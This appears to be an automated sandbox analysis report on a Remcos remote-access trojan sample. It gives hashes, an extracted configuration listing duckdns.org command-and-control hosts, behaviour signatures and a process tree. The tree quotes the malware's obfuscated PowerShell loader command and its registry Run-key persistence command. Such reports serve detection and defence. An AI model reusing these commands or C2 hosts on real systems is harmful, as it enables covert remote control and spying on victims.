Overview

overview

10

Static

static

3

ad79445854...18.exe

windows7-x64

7

ad79445854...18.exe

windows10-2004-x64

10

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

8

Norby.ps1

windows7-x64

3

Norby.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/02/2025, 04:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ad7944585459312eceb71221e89b7018.exe

  • Size

    1.3MB

  • MD5

    ad7944585459312eceb71221e89b7018

  • SHA1

    74a633aeb8b7214cd035a9a767d6b8e7796e6886

  • SHA256

    a3ab1ca451d4b020eea6ba2d62e987412bd3b09a4993ea803c8105e932274177

  • SHA512

    f30d3446a95e7d7b927b27efd70f3be9f28177e0cabaa634d2cf440937578b8752152bad62b9876234fee964f2a9ed1cc76ca75153cf754a8156f49d53beed9e

  • SSDEEP

    24576:/orvz2P1S4CcWArIu/YmM3LmTwoSXo9OvOJ2Vioy:ke5taMM3Lxoh9OAKioy

Score
10/10
remcossenddiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Send

C2

kavemarb99juyet1.duckdns.org:4688

kavemarb99juyet1.duckdns.org:4689

kavemarb99juyet2.duckdns.org:4688

kavemarb99juyet3.duckdns.org:4688

kavemarb99juyet4.duckdns.org:4688

kavemarb99juyet5.duckdns.org:4688

kavemarb99juyet6.duckdns.org:4688
Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    osokwu.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    true

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    alepoty.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    kijmnbytgs-Y92N9U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Downloads MZ/PE file 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Blocklisted process makes network request 5 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ad7944585459312eceb71221e89b7018.exe
    "C:\Users\Admin\AppData\Local\Temp\ad7944585459312eceb71221e89b7018.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized "$Hospitalsbehandlede=gc -Raw 'C:\Users\Admin\AppData\Roaming\inexorableness\vildfre\Norby.Drs';$Brugtpriss=$Hospitalsbehandlede.SubString(53539,3);.$Brugtpriss($Hospitalsbehandlede)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2372
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2464
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mbelarkitekt" /t REG_EXPAND_SZ /d "%Boreformndenes% -windowstyle 1 $Frivrdiens=(gi 'HKCU:\Software\Stillingskrigenes\').GetValue('Pettable');%Boreformndenes% ($Frivrdiens)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3604
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mbelarkitekt" /t REG_EXPAND_SZ /d "%Boreformndenes% -windowstyle 1 $Frivrdiens=(gi 'HKCU:\Software\Stillingskrigenes\').GetValue('Pettable');%Boreformndenes% ($Frivrdiens)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:2180
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OUM4OUJFNEEtRTBGNi00MzAxLThFQzItMTRFNzBGMkUwNTdDfSIgdXNlcmlkPSJ7ODIzMkIxMTctNjMwQy00OENDLTlGOEQtQkM0RkMzMjRENDJCfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7QjJBMzBDNzYtN0E3Qi00RjlDLUExNDEtMUMyQjUyOUJBRENEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU4MTUiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODE1MzQzMTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MDAxNzI3OTY1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    PID:4188

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Mucinogen.lnk
    Filesize

    776B

    MD5

    0e3ea0fbfb7a5ae041d93f513504997a

    SHA1

    9ab0fc83db231bb34f7189b7b6e0fb1da3a97625

    SHA256

    54f23764661545c30e05937ee5ea01546a868d9871d77d8803b1af1f155a3af9

    SHA512

    9e832597b05e4d2c1f6bae633aa18d059eaf6b4a3791844c432beb7cad8942f775d6b58dcf78666872c31578252f9fe4f99dec53aa779c93d00da8413bbcd6c9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_340lecte.r5o.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\nsa862A.tmp\nsExec.dll
    Filesize

    6KB

    MD5

    ec62e1a8d16d8f1b0eb792aa26e5de5c

    SHA1

    faa219618aec99cffb81c312728dc56c1fdc5798

    SHA256

    193d396fc7be5fed9d585de3c43e23d640c1dce725499f0274b3898c248545aa

    SHA512

    cb3f3458cf734ab7b964ed25cac87ff2938292eed9caae1305b2e5975bde885f4d8b06d05d4099ef614982cd55d97e9ddc0f13bbe2cdd9fb642d008788ed3017

    Download Submit

  • C:\Users\Admin\AppData\Roaming\inexorableness\vildfre\Norby.Drs
    Filesize

    52KB

    MD5

    237cdf672782754d57c42a5b82371b98

    SHA1

    6fe41a22c98e07b85ceb25b0870c539fe969197d

    SHA256

    26c1ca3a25a867de4b6c580a67c25f0b772a8d0d1ee9bb87facf3daa741cac57

    SHA512

    c97e1a229e3280c591b0bc76ea6850e8c5ee90420eea1d09a9a5f1effd264d06c8ce4aae166d43de00f1fc68422f277809cd899e33fee505d9be116efa8a0ce9

    Download Submit

  • C:\Users\Admin\AppData\Roaming\inexorableness\vildfre\Unavoidability.Shi
    Filesize

    316KB

    MD5

    55c16c99788bae84d0ae35a5bc6ac26b

    SHA1

    6b120598f82cded9cf0e3d73b19d845a38906d05

    SHA256

    05f6ec090d9845e8a491dff2bba71700447e2a39c64c2e6d2e102cb10cc51e4c

    SHA512

    98346632cf55138d293a42c74e20372642b34edf51a77abe7b10ae8741495b970af4054c60b16b44f44385a090043ea40366c35e8a303fde154af282a8529ecc

    Download Submit

  • memory/2372-1193-0x0000000007690000-0x00000000076AE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2372-1197-0x00000000077C0000-0x00000000077CA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2372-1161-0x0000000005B50000-0x0000000005BB6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2372-1162-0x0000000005BC0000-0x0000000005C26000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2372-1158-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1172-0x0000000005C30000-0x0000000005F84000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2372-1173-0x0000000006230000-0x000000000624E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2372-1174-0x0000000006270000-0x00000000062BC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2372-1176-0x0000000006720000-0x000000000673A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2372-1175-0x0000000007500000-0x0000000007596000-memory.dmp

    Filesize

    600KB

    Download

  • memory/2372-1177-0x0000000006780000-0x00000000067A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2372-1178-0x0000000007B50000-0x00000000080F4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/2372-1159-0x00000000053B0000-0x00000000059D8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2372-1180-0x0000000008780000-0x0000000008DFA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/2372-1183-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1182-0x0000000070110000-0x000000007015C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2372-1181-0x0000000007650000-0x0000000007682000-memory.dmp

    Filesize

    200KB

    Download

  • memory/2372-1157-0x0000000002C50000-0x0000000002C86000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2372-1194-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1195-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1196-0x00000000076C0000-0x0000000007763000-memory.dmp

    Filesize

    652KB

    Download

  • memory/2372-1160-0x0000000005280000-0x00000000052A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2372-1198-0x0000000007920000-0x0000000007931000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2372-1199-0x0000000007970000-0x000000000797E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2372-1200-0x0000000007980000-0x0000000007994000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2372-1201-0x00000000079C0000-0x00000000079DA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2372-1202-0x00000000079B0000-0x00000000079B8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2372-1203-0x0000000007A10000-0x0000000007A3A000-memory.dmp

    Filesize

    168KB

    Download

  • memory/2372-1204-0x0000000007A40000-0x0000000007A64000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2372-1205-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1207-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1156-0x0000000073C5E000-0x0000000073C5F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2372-1209-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1210-0x0000000073C5E000-0x0000000073C5F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2372-1211-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1212-0x0000000008E00000-0x000000000DF37000-memory.dmp

    Filesize

    81.2MB

    Download

  • memory/2372-1213-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1214-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1215-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2372-1217-0x0000000073C50000-0x0000000074400000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2464-1219-0x0000000001020000-0x0000000002274000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2464-1227-0x0000000001020000-0x0000000002274000-memory.dmp

    Filesize

    18.3MB

    Download